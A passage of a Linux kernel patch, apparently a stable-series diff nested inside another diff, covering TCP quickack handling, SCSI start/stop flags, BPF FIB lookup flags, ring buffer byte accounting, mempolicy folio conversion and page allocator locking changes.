+-	struct nh_info *nhi;
+-
+-	if (nh->is_group) {
+-		struct nh_group *nh_grp;
+-
+-		nh_grp = rcu_dereference_bh_rtnl(nh->nh_grp);
+-		nh = nexthop_mpath_select(nh_grp, 0);
+-		if (!nh)
+-			return NULL;
+-	}
+-
+-	nhi = rcu_dereference_bh_rtnl(nh->nh_info);
+-	if (nhi->family == AF_INET6)
+-		return &nhi->fib6_nh;
+-
+-	return NULL;
+-}
+-
+ static inline struct net_device *fib6_info_nh_dev(struct fib6_info *f6i)
+ {
+ 	struct fib6_nh *fib6_nh;
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index 5fd69f2342a44..9ebb54122bb71 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -355,12 +355,14 @@ ssize_t tcp_splice_read(struct socket *sk, loff_t *ppos,
+ struct sk_buff *tcp_stream_alloc_skb(struct sock *sk, int size, gfp_t gfp,
+ 				     bool force_schedule);
+ 
+-static inline void tcp_dec_quickack_mode(struct sock *sk,
+-					 const unsigned int pkts)
++static inline void tcp_dec_quickack_mode(struct sock *sk)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);
+ 
+ 	if (icsk->icsk_ack.quick) {
++		/* How many ACKs S/ACKing new data have we sent? */
++		const unsigned int pkts = inet_csk_ack_scheduled(sk) ? 1 : 0;
++
+ 		if (pkts >= icsk->icsk_ack.quick) {
+ 			icsk->icsk_ack.quick = 0;
+ 			/* Leaving quickack mode we deflate ATO. */
+diff --git a/include/scsi/scsi_device.h b/include/scsi/scsi_device.h
+index 006858ed04e8c..dc2cff18b68bd 100644
+--- a/include/scsi/scsi_device.h
++++ b/include/scsi/scsi_device.h
+@@ -161,6 +161,10 @@ struct scsi_device {
+ 				 * pass settings from slave_alloc to scsi
+ 				 * core. */
+ 	unsigned int eh_timeout; /* Error handling timeout */
++
++	bool manage_system_start_stop; /* Let HLD (sd) manage system start/stop */
++	bool manage_runtime_start_stop; /* Let HLD (sd) manage runtime start/stop */
++
+ 	unsigned removable:1;
+ 	unsigned changed:1;	/* Data invalid due to media change */
+ 	unsigned busy:1;	/* Used to prevent races */
+@@ -192,7 +196,7 @@ struct scsi_device {
+ 	unsigned use_192_bytes_for_3f:1; /* ask for 192 bytes from page 0x3f */
+ 	unsigned no_start_on_add:1;	/* do not issue start on add */
+ 	unsigned allow_restart:1; /* issue START_UNIT in error handler */
+-	unsigned manage_start_stop:1;	/* Let HLD (sd) manage start/stop */
++	unsigned no_start_on_resume:1; /* Do not issue START_STOP_UNIT on resume */
+ 	unsigned start_stop_pwr_cond:1;	/* Set power cond. in START_STOP_UNIT */
+ 	unsigned no_uld_attach:1; /* disable connecting to upper level drivers */
+ 	unsigned select_no_atn:1;
+diff --git a/include/scsi/scsi_host.h b/include/scsi/scsi_host.h
+index d27d9fb7174c8..71def41b1ad78 100644
+--- a/include/scsi/scsi_host.h
++++ b/include/scsi/scsi_host.h
+@@ -752,7 +752,7 @@ extern int __must_check scsi_add_host_with_dma(struct Scsi_Host *,
+ 					       struct device *,
+ 					       struct device *);
+ extern void scsi_scan_host(struct Scsi_Host *);
+-extern void scsi_rescan_device(struct device *);
++extern int scsi_rescan_device(struct scsi_device *sdev);
+ extern void scsi_remove_host(struct Scsi_Host *);
+ extern struct Scsi_Host *scsi_host_get(struct Scsi_Host *);
+ extern int scsi_host_busy(struct Scsi_Host *shost);
+diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h
+index 53bc487947197..92dbe89dafbf5 100644
+--- a/include/uapi/linux/bpf.h
++++ b/include/uapi/linux/bpf.h
+@@ -3112,6 +3112,11 @@ union bpf_attr {
+  *		**BPF_FIB_LOOKUP_OUTPUT**
+  *			Perform lookup from an egress perspective (default is
+  *			ingress).
++ *		**BPF_FIB_LOOKUP_SKIP_NEIGH**
++ *			Skip the neighbour table lookup. *params*->dmac
++ *			and *params*->smac will not be set as output. A common
++ *			use case is to call **bpf_redirect_neigh**\ () after
++ *			doing **bpf_fib_lookup**\ ().
+  *
+  *		*ctx* is either **struct xdp_md** for XDP programs or
+  *		**struct sk_buff** tc cls_act programs.
+@@ -6678,6 +6683,7 @@ struct bpf_raw_tracepoint_args {
+ enum {
+ 	BPF_FIB_LOOKUP_DIRECT  = (1U << 0),
+ 	BPF_FIB_LOOKUP_OUTPUT  = (1U << 1),
++	BPF_FIB_LOOKUP_SKIP_NEIGH = (1U << 2),
+ };
+ 
+ enum {
+diff --git a/include/uapi/linux/ipv6.h b/include/uapi/linux/ipv6.h
+index 53326dfc59ecb..4fa8511b1e355 100644
+--- a/include/uapi/linux/ipv6.h
++++ b/include/uapi/linux/ipv6.h
+@@ -198,6 +198,7 @@ enum {
+ 	DEVCONF_IOAM6_ID_WIDE,
+ 	DEVCONF_NDISC_EVICT_NOCARRIER,
+ 	DEVCONF_ACCEPT_UNTRACKED_NA,
++	DEVCONF_ACCEPT_RA_MIN_LFT,
+ 	DEVCONF_MAX
+ };
+ 
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index 2f562cf961e0a..b7383358c4ea1 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -354,10 +354,11 @@ static void rb_init_page(struct buffer_data_page *bpage)
+ 	local_set(&bpage->commit, 0);
+ }
+ 
+-/*
+- * Also stolen from mm/slob.c. Thanks to Mathieu Desnoyers for pointing
+- * this issue out.
+- */
++static __always_inline unsigned int rb_page_commit(struct buffer_page *bpage)
++{
++	return local_read(&bpage->page->commit);
++}
++
+ static void free_buffer_page(struct buffer_page *bpage)
+ {
+ 	free_page((unsigned long)bpage->page);
+@@ -2024,7 +2025,7 @@ rb_remove_pages(struct ring_buffer_per_cpu *cpu_buffer, unsigned long nr_pages)
+ 			 * Increment overrun to account for the lost events.
+ 			 */
+ 			local_add(page_entries, &cpu_buffer->overrun);
+-			local_sub(BUF_PAGE_SIZE, &cpu_buffer->entries_bytes);
++			local_sub(rb_page_commit(to_remove_page), &cpu_buffer->entries_bytes);
+ 			local_inc(&cpu_buffer->pages_lost);
+ 		}
+ 
+@@ -2368,11 +2369,6 @@ rb_reader_event(struct ring_buffer_per_cpu *cpu_buffer)
+ 			       cpu_buffer->reader_page->read);
+ }
+ 
+-static __always_inline unsigned rb_page_commit(struct buffer_page *bpage)
+-{
+-	return local_read(&bpage->page->commit);
+-}
+-
+ static struct ring_buffer_event *
+ rb_iter_head_event(struct ring_buffer_iter *iter)
+ {
+@@ -2518,7 +2514,7 @@ rb_handle_head_page(struct ring_buffer_per_cpu *cpu_buffer,
+ 		 * the counters.
+ 		 */
+ 		local_add(entries, &cpu_buffer->overrun);
+-		local_sub(BUF_PAGE_SIZE, &cpu_buffer->entries_bytes);
++		local_sub(rb_page_commit(next_page), &cpu_buffer->entries_bytes);
+ 		local_inc(&cpu_buffer->pages_lost);
+ 
+ 		/*
+@@ -2661,9 +2657,6 @@ rb_reset_tail(struct ring_buffer_per_cpu *cpu_buffer,
+ 
+ 	event = __rb_page_index(tail_page, tail);
+ 
+-	/* account for padding bytes */
+-	local_add(BUF_PAGE_SIZE - tail, &cpu_buffer->entries_bytes);
+-
+ 	/*
+ 	 * Save the original length to the meta data.
+ 	 * This will be used by the reader to add lost event
+@@ -2677,7 +2670,8 @@ rb_reset_tail(struct ring_buffer_per_cpu *cpu_buffer,
+ 	 * write counter enough to allow another writer to slip
+ 	 * in on this page.
+ 	 * We put in a discarded commit instead, to make sure
+-	 * that this space is not used again.
++	 * that this space is not used again, and this space will
++	 * not be accounted into 'entries_bytes'.
+ 	 *
+ 	 * If we are less than the minimum size, we don't need to
+ 	 * worry about it.
+@@ -2702,6 +2696,9 @@ rb_reset_tail(struct ring_buffer_per_cpu *cpu_buffer,
+ 	/* time delta must be non zero */
+ 	event->time_delta = 1;
+ 
++	/* account for padding bytes */
++	local_add(BUF_PAGE_SIZE - tail, &cpu_buffer->entries_bytes);
++
+ 	/* Make sure the padding is visible before the tail_page->write update */
+ 	smp_wmb();
+ 
+@@ -4219,7 +4216,7 @@ u64 ring_buffer_oldest_event_ts(struct trace_buffer *buffer, int cpu)
+ EXPORT_SYMBOL_GPL(ring_buffer_oldest_event_ts);
+ 
+ /**
+- * ring_buffer_bytes_cpu - get the number of bytes consumed in a cpu buffer
++ * ring_buffer_bytes_cpu - get the number of bytes unconsumed in a cpu buffer
+  * @buffer: The ring buffer
+  * @cpu: The per CPU buffer to read from.
+  */
+@@ -4729,6 +4726,7 @@ static void rb_advance_reader(struct ring_buffer_per_cpu *cpu_buffer)
+ 
+ 	length = rb_event_length(event);
+ 	cpu_buffer->reader_page->read += length;
++	cpu_buffer->read_bytes += length;
+ }
+ 
+ static void rb_advance_iter(struct ring_buffer_iter *iter)
+@@ -5824,7 +5822,7 @@ int ring_buffer_read_page(struct trace_buffer *buffer,
+ 	} else {
+ 		/* update the entry counter */
+ 		cpu_buffer->read += rb_page_entries(reader);
+-		cpu_buffer->read_bytes += BUF_PAGE_SIZE;
++		cpu_buffer->read_bytes += rb_page_commit(reader);
+ 
+ 		/* swap the pages */
+ 		rb_init_page(bpage);
+diff --git a/mm/memory.c b/mm/memory.c
+index 2083078cd0615..0d1b3ee8fcd7a 100644
+--- a/mm/memory.c
++++ b/mm/memory.c
+@@ -672,6 +672,16 @@ out:
+ 	return pfn_to_page(pfn);
+ }
+ 
++struct folio *vm_normal_folio(struct vm_area_struct *vma, unsigned long addr,
++			    pte_t pte)
++{
++	struct page *page = vm_normal_page(vma, addr, pte);
++
++	if (page)
++		return page_folio(page);
++	return NULL;
++}
++
+ #ifdef CONFIG_TRANSPARENT_HUGEPAGE
+ struct page *vm_normal_page_pmd(struct vm_area_struct *vma, unsigned long addr,
+ 				pmd_t pmd)
+diff --git a/mm/mempolicy.c b/mm/mempolicy.c
+index 7d36dd95d1fff..bfe2d1d50fbee 100644
+--- a/mm/mempolicy.c
++++ b/mm/mempolicy.c
+@@ -414,7 +414,7 @@ static const struct mempolicy_operations mpol_ops[MPOL_MAX] = {
+ 	},
+ };
+ 
+-static int migrate_page_add(struct page *page, struct list_head *pagelist,
++static int migrate_folio_add(struct folio *folio, struct list_head *foliolist,
+ 				unsigned long flags);
+ 
+ struct queue_pages {
+@@ -424,6 +424,7 @@ struct queue_pages {
+ 	unsigned long start;
+ 	unsigned long end;
+ 	struct vm_area_struct *first;
++	bool has_unmovable;
+ };
+ 
+ /*
+@@ -442,21 +443,20 @@ static inline bool queue_pages_required(struct page *page,
+ }
+ 
+ /*
+- * queue_pages_pmd() has three possible return values:
+- * 0 - pages are placed on the right node or queued successfully, or
+- *     special page is met, i.e. huge zero page.
+- * 1 - there is unmovable page, and MPOL_MF_MOVE* & MPOL_MF_STRICT were
+- *     specified.
++ * queue_folios_pmd() has three possible return values:
++ * 0 - folios are placed on the right node or queued successfully, or
++ *     special page is met, i.e. zero page, or unmovable page is found
++ *     but continue walking (indicated by queue_pages.has_unmovable).
+  * -EIO - is migration entry or only MPOL_MF_STRICT was specified and an
+- *        existing page was already on a node that does not follow the
++ *        existing folio was already on a node that does not follow the
+  *        policy.
+  */
+-static int queue_pages_pmd(pmd_t *pmd, spinlock_t *ptl, unsigned long addr,
++static int queue_folios_pmd(pmd_t *pmd, spinlock_t *ptl, unsigned long addr,
+ 				unsigned long end, struct mm_walk *walk)
+ 	__releases(ptl)
+ {
+ 	int ret = 0;
+-	struct page *page;
++	struct folio *folio;
+ 	struct queue_pages *qp = walk->private;
+ 	unsigned long flags;
+ 
+@@ -464,20 +464,20 @@ static int queue_pages_pmd(pmd_t *pmd, spinlock_t *ptl, unsigned long addr,
+ 		ret = -EIO;
+ 		goto unlock;
+ 	}
+-	page = pmd_page(*pmd);
+-	if (is_huge_zero_page(page)) {
++	folio = pfn_folio(pmd_pfn(*pmd));
++	if (is_huge_zero_page(&folio->page)) {
+ 		walk->action = ACTION_CONTINUE;
+ 		goto unlock;
+ 	}
+-	if (!queue_pages_required(page, qp))
++	if (!queue_pages_required(&folio->page, qp))
+ 		goto unlock;
+ 
+ 	flags = qp->flags;
+-	/* go to thp migration */
++	/* go to folio migration */
+ 	if (flags & (MPOL_MF_MOVE | MPOL_MF_MOVE_ALL)) {
+ 		if (!vma_migratable(walk->vma) ||
+-		    migrate_page_add(page, qp->pagelist, flags)) {
+-			ret = 1;
++		    migrate_folio_add(folio, qp->pagelist, flags)) {
++			qp->has_unmovable = true;
+ 			goto unlock;
+ 		}
+ 	} else
+@@ -491,28 +491,26 @@ unlock:
+  * Scan through pages checking if pages follow certain conditions,
+  * and move them to the pagelist if they do.
+  *
+- * queue_pages_pte_range() has three possible return values:
+- * 0 - pages are placed on the right node or queued successfully, or
+- *     special page is met, i.e. zero page.
+- * 1 - there is unmovable page, and MPOL_MF_MOVE* & MPOL_MF_STRICT were
+- *     specified.
+- * -EIO - only MPOL_MF_STRICT was specified and an existing page was already
++ * queue_folios_pte_range() has three possible return values:
++ * 0 - folios are placed on the right node or queued successfully, or
++ *     special page is met, i.e. zero page, or unmovable page is found
++ *     but continue walking (indicated by queue_pages.has_unmovable).
++ * -EIO - only MPOL_MF_STRICT was specified and an existing folio was already
+  *        on a node that does not follow the policy.
+  */
+-static int queue_pages_pte_range(pmd_t *pmd, unsigned long addr,
++static int queue_folios_pte_range(pmd_t *pmd, unsigned long addr,
+ 			unsigned long end, struct mm_walk *walk)
+ {
+ 	struct vm_area_struct *vma = walk->vma;
+-	struct page *page;
++	struct folio *folio;
+ 	struct queue_pages *qp = walk->private;
+ 	unsigned long flags = qp->flags;
+-	bool has_unmovable = false;
+ 	pte_t *pte, *mapped_pte;
+ 	spinlock_t *ptl;
+ 
+ 	ptl = pmd_trans_huge_lock(pmd, vma);
+ 	if (ptl)
+-		return queue_pages_pmd(pmd, ptl, addr, end, walk);
++		return queue_folios_pmd(pmd, ptl, addr, end, walk);
+ 
+ 	if (pmd_trans_unstable(pmd))
+ 		return 0;
+@@ -521,40 +519,38 @@ static int queue_pages_pte_range(pmd_t *pmd, unsigned long addr,
+ 	for (; addr != end; pte++, addr += PAGE_SIZE) {
+ 		if (!pte_present(*pte))
+ 			continue;
+-		page = vm_normal_page(vma, addr, *pte);
+-		if (!page || is_zone_device_page(page))
++		folio = vm_normal_folio(vma, addr, *pte);
++		if (!folio || folio_is_zone_device(folio))
+ 			continue;
+ 		/*
+-		 * vm_normal_page() filters out zero pages, but there might
+-		 * still be PageReserved pages to skip, perhaps in a VDSO.
++		 * vm_normal_folio() filters out zero pages, but there might
++		 * still be reserved folios to skip, perhaps in a VDSO.
+ 		 */
+-		if (PageReserved(page))
++		if (folio_test_reserved(folio))
+ 			continue;
+-		if (!queue_pages_required(page, qp))
++		if (!queue_pages_required(&folio->page, qp))
+ 			continue;
+ 		if (flags & (MPOL_MF_MOVE | MPOL_MF_MOVE_ALL)) {
+-			/* MPOL_MF_STRICT must be specified if we get here */
+-			if (!vma_migratable(vma)) {
+-				has_unmovable = true;
+-				break;
+-			}
++			/*
++			 * MPOL_MF_STRICT must be specified if we get here.
++			 * Continue walking vmas due to MPOL_MF_MOVE* flags.
++			 */
++			if (!vma_migratable(vma))
++				qp->has_unmovable = true;
+ 
+ 			/*
+ 			 * Do not abort immediately since there may be
+ 			 * temporary off LRU pages in the range.  Still
+ 			 * need migrate other LRU pages.
+ 			 */
+-			if (migrate_page_add(page, qp->pagelist, flags))
+-				has_unmovable = true;
++			if (migrate_folio_add(folio, qp->pagelist, flags))
++				qp->has_unmovable = true;
+ 		} else
+ 			break;
+ 	}
+ 	pte_unmap_unlock(mapped_pte, ptl);
+ 	cond_resched();
+ 
+-	if (has_unmovable)
+-		return 1;
+-
+ 	return addr != end ? -EIO : 0;
+ }
+ 
+@@ -594,7 +590,7 @@ static int queue_pages_hugetlb(pte_t *pte, unsigned long hmask,
+ 		 * Detecting misplaced page but allow migrating pages which
+ 		 * have been queued.
+ 		 */
+-		ret = 1;
++		qp->has_unmovable = true;
+ 		goto unlock;
+ 	}
+ 
+@@ -608,7 +604,7 @@ static int queue_pages_hugetlb(pte_t *pte, unsigned long hmask,
+ 			 * Failed to isolate page but allow migrating pages
+ 			 * which have been queued.
+ 			 */
+-			ret = 1;
++			qp->has_unmovable = true;
+ 	}
+ unlock:
+ 	spin_unlock(ptl);
+@@ -705,7 +701,7 @@ static int queue_pages_test_walk(unsigned long start, unsigned long end,
+ 
+ static const struct mm_walk_ops queue_pages_walk_ops = {
+ 	.hugetlb_entry		= queue_pages_hugetlb,
+-	.pmd_entry		= queue_pages_pte_range,
++	.pmd_entry		= queue_folios_pte_range,
+ 	.test_walk		= queue_pages_test_walk,
+ };
+ 
+@@ -737,10 +733,13 @@ queue_pages_range(struct mm_struct *mm, unsigned long start, unsigned long end,
+ 		.start = start,
+ 		.end = end,
+ 		.first = NULL,
++		.has_unmovable = false,
+ 	};
+ 
+ 	err = walk_page_range(mm, start, end, &queue_pages_walk_ops, &qp);
+ 
++	if (qp.has_unmovable)
++		err = 1;
+ 	if (!qp.first)
+ 		/* whole range in hole */
+ 		err = -EFAULT;
+@@ -1012,27 +1011,28 @@ static long do_get_mempolicy(int *policy, nodemask_t *nmask,
+ }
+ 
+ #ifdef CONFIG_MIGRATION
+-/*
+- * page migration, thp tail pages can be passed.
+- */
+-static int migrate_page_add(struct page *page, struct list_head *pagelist,
++static int migrate_folio_add(struct folio *folio, struct list_head *foliolist,
+ 				unsigned long flags)
+ {
+-	struct page *head = compound_head(page);
+ 	/*
+-	 * Avoid migrating a page that is shared with others.
++	 * We try to migrate only unshared folios. If it is shared it
++	 * is likely not worth migrating.
++	 *
++	 * To check if the folio is shared, ideally we want to make sure
++	 * every page is mapped to the same process. Doing that is very
++	 * expensive, so check the estimated mapcount of the folio instead.
+ 	 */
+-	if ((flags & MPOL_MF_MOVE_ALL) || page_mapcount(head) == 1) {
+-		if (!isolate_lru_page(head)) {
+-			list_add_tail(&head->lru, pagelist);
+-			mod_node_page_state(page_pgdat(head),
+-				NR_ISOLATED_ANON + page_is_file_lru(head),
+-				thp_nr_pages(head));
++	if ((flags & MPOL_MF_MOVE_ALL) || folio_estimated_sharers(folio) == 1) {
++		if (!folio_isolate_lru(folio)) {
++			list_add_tail(&folio->lru, foliolist);
++			node_stat_mod_folio(folio,
++				NR_ISOLATED_ANON + folio_is_file_lru(folio),
++				folio_nr_pages(folio));
+ 		} else if (flags & MPOL_MF_STRICT) {
+ 			/*
+-			 * Non-movable page may reach here.  And, there may be
+-			 * temporary off LRU pages or non-LRU movable pages.
+-			 * Treat them as unmovable pages since they can't be
++			 * Non-movable folio may reach here.  And, there may be
++			 * temporary off LRU folios or non-LRU movable folios.
++			 * Treat them as unmovable folios since they can't be
+ 			 * isolated, so they can't be moved at the moment.  It
+ 			 * should return -EIO for this case too.
+ 			 */
+@@ -1224,7 +1224,7 @@ static struct page *new_page(struct page *page, unsigned long start)
+ }
+ #else
+ 
+-static int migrate_page_add(struct page *page, struct list_head *pagelist,
++static int migrate_folio_add(struct folio *folio, struct list_head *foliolist,
+ 				unsigned long flags)
+ {
+ 	return -EIO;
+@@ -1337,7 +1337,7 @@ static long do_mbind(unsigned long start, unsigned long len,
+ 				putback_movable_pages(&pagelist);
+ 		}
+ 
+-		if ((ret > 0) || (nr_failed && (flags & MPOL_MF_STRICT)))
++		if (((ret > 0) || nr_failed) && (flags & MPOL_MF_STRICT))
+ 			err = -EIO;
+ 	} else {
+ up_out:
+diff --git a/mm/page_alloc.c b/mm/page_alloc.c
+index 69668817fed37..ca017c6008b7c 100644
+--- a/mm/page_alloc.c
++++ b/mm/page_alloc.c
+@@ -170,21 +170,12 @@ static DEFINE_MUTEX(pcp_batch_high_lock);
+ 	_ret;								\
+ })
+ 
+-#define pcpu_spin_lock_irqsave(type, member, ptr, flags)		\
++#define pcpu_spin_trylock(type, member, ptr)				\
+ ({									\
+ 	type *_ret;							\
+ 	pcpu_task_pin();						\
+ 	_ret = this_cpu_ptr(ptr);					\
+-	spin_lock_irqsave(&_ret->member, flags);			\
+-	_ret;								\
+-})
+-
+-#define pcpu_spin_trylock_irqsave(type, member, ptr, flags)		\
+-({									\
+-	type *_ret;							\
+-	pcpu_task_pin();						\
+-	_ret = this_cpu_ptr(ptr);					\
+-	if (!spin_trylock_irqsave(&_ret->member, flags)) {		\
++	if (!spin_trylock(&_ret->member)) {				\
+ 		pcpu_task_unpin();					\
+ 		_ret = NULL;						\
+ 	}								\
+@@ -197,27 +188,16 @@ static DEFINE_MUTEX(pcp_batch_high_lock);
+ 	pcpu_task_unpin();						\
+ })
+ 
+-#define pcpu_spin_unlock_irqrestore(member, ptr, flags)			\
+-({									\
+-	spin_unlock_irqrestore(&ptr->member, flags);			\
+-	pcpu_task_unpin();						\
+-})
+-
+ /* struct per_cpu_pages specific helpers. */
+ #define pcp_spin_lock(ptr)						\
+ 	pcpu_spin_lock(struct per_cpu_pages, lock, ptr)
+ 
+-#define pcp_spin_lock_irqsave(ptr, flags)				\
+-	pcpu_spin_lock_irqsave(struct per_cpu_pages, lock, ptr, flags)
+-
+-#define pcp_spin_trylock_irqsave(ptr, flags)				\
+-	pcpu_spin_trylock_irqsave(struct per_cpu_pages, lock, ptr, flags)
++#define pcp_spin_trylock(ptr)						\
++	pcpu_spin_trylock(struct per_cpu_pages, lock, ptr)
+ 
+ #define pcp_spin_unlock(ptr)						\
+ 	pcpu_spin_unlock(lock, ptr)
+ 
+-#define pcp_spin_unlock_irqrestore(ptr, flags)				\
+-	pcpu_spin_unlock_irqrestore(lock, ptr, flags)
+ #ifdef CONFIG_USE_PERCPU_NUMA_NODE_ID
+ DEFINE_PER_CPU(int, numa_node);
+ EXPORT_PER_CPU_SYMBOL(numa_node);
+@@ -1548,6 +1528,7 @@ static void free_pcppages_bulk(struct zone *zone, int count,
+ 					struct per_cpu_pages *pcp,
+ 					int pindex)
+ {
++	unsigned long flags;
+ 	int min_pindex = 0;
+ 	int max_pindex = NR_PCP_LISTS - 1;
+ 	unsigned int order;
+@@ -1563,8 +1544,7 @@ static void free_pcppages_bulk(struct zone *zone, int count,
+ 	/* Ensure requested pindex is drained first. */
+ 	pindex = pindex - 1;
+ 
+-	/* Caller must hold IRQ-safe pcp->lock so IRQs are disabled. */
+-	spin_lock(&zone->lock);
++	spin_lock_irqsave(&zone->lock, flags);
+ 	isolated_pageblocks = has_isolate_pageblock(zone);
+ 
+ 	while (count > 0) {
+@@ -1612,7 +1592,7 @@ static void free_pcppages_bulk(struct zone *zone, int count,
+ 		} while (count > 0 && !list_empty(list));
+ 	}
+ 
+-	spin_unlock(&zone->lock);
++	spin_unlock_irqrestore(&zone->lock, flags);
+ }
+ 
+ static void free_one_page(struct zone *zone,
+@@ -3126,10 +3106,10 @@ static int rmqueue_bulk(struct zone *zone, unsigned int order,
+ 			unsigned long count, struct list_head *list,
+ 			int migratetype, unsigned int alloc_flags)
+ {
++	unsigned long flags;
+ 	int i, allocated = 0;
+ 
+-	/* Caller must hold IRQ-safe pcp->lock so IRQs are disabled. */
+-	spin_lock(&zone->lock);
++	spin_lock_irqsave(&zone->lock, flags);
+ 	for (i = 0; i < count; ++i) {
+ 		struct page *page = __rmqueue(zone, order, migratetype,
+ 								alloc_flags);
+@@ -3163,7 +3143,7 @@ static int rmqueue_bulk(struct zone *zone, unsigned int order,
+ 	 * pages added to the pcp list.
+ 	 */
+ 	__mod_zone_page_state(zone, NR_FREE_PAGES, -(i << order));
+-	spin_unlock(&zone->lock);
++	spin_unlock_irqrestore(&zone->lock, flags);
+ 	return allocated;
+ }
+ 
+@@ -3180,16 +3160,9 @@ void drain_zone_pages(struct zone *zone, struct per_cpu_pages *pcp)
+ 	batch = READ_ONCE(pcp->batch);
+ 	to_drain = min(pcp->count, batch);
+ 	if (to_drain > 0) {
+-		unsigned long flags;
+-
+-		/*
+-		 * free_pcppages_bulk expects IRQs disabled for zone->lock
+-		 * so even though pcp->lock is not intended to be IRQ-safe,
+-		 * it's needed in this context.
+-		 */
+-		spin_lock_irqsave(&pcp->lock, flags);
++		spin_lock(&pcp->lock);
+ 		free_pcppages_bulk(zone, to_drain, pcp, 0);
+-		spin_unlock_irqrestore(&pcp->lock, flags);
++		spin_unlock(&pcp->lock);
+ 	}
+ }
+ #endif
+@@ -3203,12 +3176,9 @@ static void drain_pages_zone(unsigned int cpu, struct zone *zone)
+ 
+ 	pcp = per_cpu_ptr(zone->per_cpu_pageset, cpu);
+ 	if (pcp->count) {
+-		unsigned long flags;
+-
+-		/* See drain_zone_pages on why this is disabling IRQs */
+-		spin_lock_irqsave(&pcp->lock, flags);
++		spin_lock(&pcp->lock);
+ 		free_pcppages_bulk(zone, pcp->count, pcp, 0);
+-		spin_unlock_irqrestore(&pcp->lock, flags);
++		spin_unlock(&pcp->lock);
+ 	}
+ }
+ 
+@@ -3474,12 +3444,11 @@ static void free_unref_page_commit(struct zone *zone, struct per_cpu_pages *pcp,
+  */
+ void free_unref_page(struct page *page, unsigned int order)
+ {
+-	unsigned long flags;
+ 	unsigned long __maybe_unused UP_flags;
+ 	struct per_cpu_pages *pcp;
+ 	struct zone *zone;
+ 	unsigned long pfn = page_to_pfn(page);
+-	int migratetype;
++	int migratetype, pcpmigratetype;
+ 
+ 	if (!free_unref_page_prepare(page, pfn, order))
+ 		return;
+@@ -3487,25 +3456,25 @@ void free_unref_page(struct page *page, unsigned int order)
+ 	/*
+ 	 * We only track unmovable, reclaimable and movable on pcp lists.
+ 	 * Place ISOLATE pages on the isolated list because they are being
+-	 * offlined but treat HIGHATOMIC as movable pages so we can get those
+-	 * areas back if necessary. Otherwise, we may have to free
++	 * offlined but treat HIGHATOMIC and CMA as movable pages so we can
++	 * get those areas back if necessary. Otherwise, we may have to free
+ 	 * excessively into the page allocator
+ 	 */
+-	migratetype = get_pcppage_migratetype(page);
++	migratetype = pcpmigratetype = get_pcppage_migratetype(page);
+ 	if (unlikely(migratetype >= MIGRATE_PCPTYPES)) {
+ 		if (unlikely(is_migrate_isolate(migratetype))) {
+ 			free_one_page(page_zone(page), page, pfn, order, migratetype, FPI_NONE);
+ 			return;
+ 		}
+-		migratetype = MIGRATE_MOVABLE;
++		pcpmigratetype = MIGRATE_MOVABLE;
+ 	}
+ 
+ 	zone = page_zone(page);
+ 	pcp_trylock_prepare(UP_flags);
+-	pcp = pcp_spin_trylock_irqsave(zone->per_cpu_pageset, flags);
++	pcp = pcp_spin_trylock(zone->per_cpu_pageset);
+ 	if (pcp) {
+-		free_unref_page_commit(zone, pcp, page, migratetype, order);
+-		pcp_spin_unlock_irqrestore(pcp, flags);
++		free_unref_page_commit(zone, pcp, page, pcpmigratetype, order);
++		pcp_spin_unlock(pcp);
+ 	} else {
+ 		free_one_page(zone, page, pfn, order, migratetype, FPI_NONE);
+ 	}
+@@ -3517,10 +3486,10 @@ void free_unref_page(struct page *page, unsigned int order)
+  */
+ void free_unref_page_list(struct list_head *list)
+ {
++	unsigned long __maybe_unused UP_flags;
+ 	struct page *page, *next;
+ 	struct per_cpu_pages *pcp = NULL;
+ 	struct zone *locked_zone = NULL;
+-	unsigned long flags;
+ 	int batch_count = 0;
+ 	int migratetype;
+ 
+@@ -3547,20 +3516,37 @@ void free_unref_page_list(struct list_head *list)
+ 	list_for_each_entry_safe(page, next, list, lru) {
+ 		struct zone *zone = page_zone(page);
+ 
++		list_del(&page->lru);
++		migratetype = get_pcppage_migratetype(page);
++
+ 		/* Different zone, different pcp lock. */
+ 		if (zone != locked_zone) {
+-			if (pcp)
+-				pcp_spin_unlock_irqrestore(pcp, flags);
++			if (pcp) {
++				pcp_spin_unlock(pcp);
++				pcp_trylock_finish(UP_flags);
++			}
+ 
++			/*
++			 * trylock is necessary as pages may be getting freed
++			 * from IRQ or SoftIRQ context after an IO completion.
++			 */
++			pcp_trylock_prepare(UP_flags);
++			pcp = pcp_spin_trylock(zone->per_cpu_pageset);
++			if (unlikely(!pcp)) {
++				pcp_trylock_finish(UP_flags);
++				free_one_page(zone, page, page_to_pfn(page),
++					      0, migratetype, FPI_NONE);
++				locked_zone = NULL;
++				continue;
++			}
+ 			locked_zone = zone;
+-			pcp = pcp_spin_lock_irqsave(locked_zone->per_cpu_pageset, flags);
++			batch_count = 0;
+ 		}
+ 
+ 		/*
+ 		 * Non-isolated types over MIGRATE_PCPTYPES get added
+ 		 * to the MIGRATE_MOVABLE pcp list.
+ 		 */
+-		migratetype = get_pcppage_migratetype(page);
+ 		if (unlikely(migratetype >= MIGRATE_PCPTYPES))
+ 			migratetype = MIGRATE_MOVABLE;
+ 
+@@ -3568,18 +3554,23 @@ void free_unref_page_list(struct list_head *list)
+ 		free_unref_page_commit(zone, pcp, page, migratetype, 0);
+ 
+ 		/*
+-		 * Guard against excessive IRQ disabled times when we get
+-		 * a large list of pages to free.
++		 * Guard against excessive lock hold times when freeing
++		 * a large list of pages. Lock will be reacquired if
++		 * necessary on the next iteration.
+ 		 */
+ 		if (++batch_count == SWAP_CLUSTER_MAX) {
+-			pcp_spin_unlock_irqrestore(pcp, flags);
++			pcp_spin_unlock(pcp);
++			pcp_trylock_finish(UP_flags);
+ 			batch_count = 0;
+-			pcp = pcp_spin_lock_irqsave(locked_zone->per_cpu_pageset, flags);
++			pcp = NULL;
++			locked_zone = NULL;
+ 		}
+ 	}
+ 
+-	if (pcp)
+-		pcp_spin_unlock_irqrestore(pcp, flags);
++	if (pcp) {
++		pcp_spin_unlock(pcp);
++		pcp_trylock_finish(UP_flags);
++	}
+ }
+ 
+ /*
+@@ -3780,15 +3771,11 @@ static struct page *rmqueue_pcplist(struct zone *preferred_zone,
+ 	struct per_cpu_pages *pcp;
+ 	struct list_head *list;
+ 	struct page *page;
+-	unsigned long flags;
